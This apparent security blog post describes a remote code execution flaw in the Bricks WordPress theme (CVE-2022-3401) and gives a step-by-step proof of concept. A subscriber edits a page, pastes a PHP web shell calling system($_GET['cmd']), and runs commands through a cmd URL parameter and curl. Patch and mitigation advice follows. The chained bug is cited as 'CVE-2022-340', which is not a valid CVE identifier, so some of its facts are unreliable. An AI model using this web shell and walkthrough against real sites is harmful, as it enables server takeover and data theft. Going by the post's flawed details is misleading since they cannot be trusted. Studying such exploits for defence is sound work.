CVE-2022-3401 - Remote Code Execution in Bricks WordPress Theme (Versions 1.2 – 1.5.3)

WordPress powers more than 40% of all websites, and its extensibility through themes and plugins is both a strength and a weakness. In mid-2022, a set of severe vulnerabilities were discovered in the popular Bricks theme for WordPress, opening the doors to remote code execution (RCE) by even the least privileged users. In this post, we’ll break down CVE-2022-3401—a bug in Bricks that allows authenticated users with the lowest permissions, such as subscribers, to execute arbitrary PHP code on the site.

We'll explain how this happened, show you code snippets, and present a proof-of-concept exploit. For official reference, see the WPScan advisory and NVD entry.

What is CVE-2022-3401?

CVE-2022-3401 is a vulnerability in the Bricks theme for WordPress (versions 1.2 through 1.5.3) that allows authenticated attackers to execute arbitrary PHP code via content blocks. This is possible because the theme cares for flexibility—to a dangerous degree—letting site editors inject and execute custom code.

Compounding the issue, a related bug identified as CVE-2022-340 lets low-privileged users (like subscribers) edit any post or template when they shouldn’t be able to. Together, these flaws enable an attacker to gain full control of the server, even if they only have a subscriber account.

Unrestricted Content Editing (CVE-2022-340):

The Bricks theme accidentally grants too much access—any logged-in user, including subscribers, can edit posts, pages, and templates.

Code Block Feature (CVE-2022-3401):

The theme provides a custom “Code Block” element, designed to let admins or editors insert PHP code into site content.

Remote Code Execution:

A user with any level of access can inject code like <?php system($_GET['cmd']); ?> and have it executed by the server.

Proof of Concept: Exploiting CVE-2022-3401

Let’s get our hands dirty. The following is a simplified overview (don’t run this on a production site!).

Step 1: Register a Subscriber Account

Register on the vulnerable WordPress site and log in as a regular (subscriber-level) user.

Step 2: Access the Bricks Builder

Thanks to CVE-2022-340, you can now edit any page or template, even though you shouldn’t have permission. Open a page you want to attack in the Bricks Builder interface.

Step 3: Add a “Code Block” Element

Insert a new “Code Block” element in the page/template. Paste the following malicious PHP code into the code block field:

<?php
if(isset($_GET['cmd'])){
    system($_GET['cmd']);
}
?>

This snippet allows you to run arbitrary shell commands on the server by visiting the page with a specially crafted URL.

Visit the newly edited page and add the cmd parameter to the URL to run commands! For example

https://victimsite.com/vulnerable-page/?cmd=whoami

The output will be the server username running PHP—a clear sign you have RCE.

Full Exploit Example (Using curl)

Suppose the vulnerable site is https://victimsite.com.

# 1. Log in as subscriber and get your cookies/session.

# 2. Use the Builder interface to edit a page, or craft a POST request 
#    that adds the Code Block element with arbitrary PHP code.

# 3. Visit your page with:
curl "https://victimsite.com/vulnerable-page/?cmd=id";

Or, you could script the process via WP AJAX or the REST API, if the site exposes the right endpoints. The results will appear on the page, proving code execution.

Fixed in Bricks: Version 1.5.4

(Changelog)

WordPress advisory:

- wpvulndb.com/6fd56126-577d-4dc7-b78a-c7cc971b33dc  
 - nvd.nist.gov/vuln/detail/CVE-2022-3401

Upgrade immediately if you use any Bricks theme version between 1.2 and 1.5.3.

Audit user permissions: Restrict access to editing content and templates.

- WAF/Intrusion detection: Deploy a Web Application Firewall (like Wordfence).

Final Thoughts

The chain of CVE-2022-340 and CVE-2022-3401 is a stark reminder of why security reviews for themes and plugins are critical. If you run WordPress, always keep your themes and plugins up-to-date, and audit user permissions regularly.

Don’t wait to patch—this exploit is trivial, and script kiddies are watching!

References:  
- WPScan vulnerability entry  
- NVD CVE-2022-3401  
- Bricks Changelog  
- Wordfence: How to Secure WordPress


*This blog post is for educational purposes. Always have permission before testing any sites or software for security.*

Timeline

Published on: 10/28/2022 19:15:00 UTC
Last modified on: 11/03/2022 14:14:00 UTC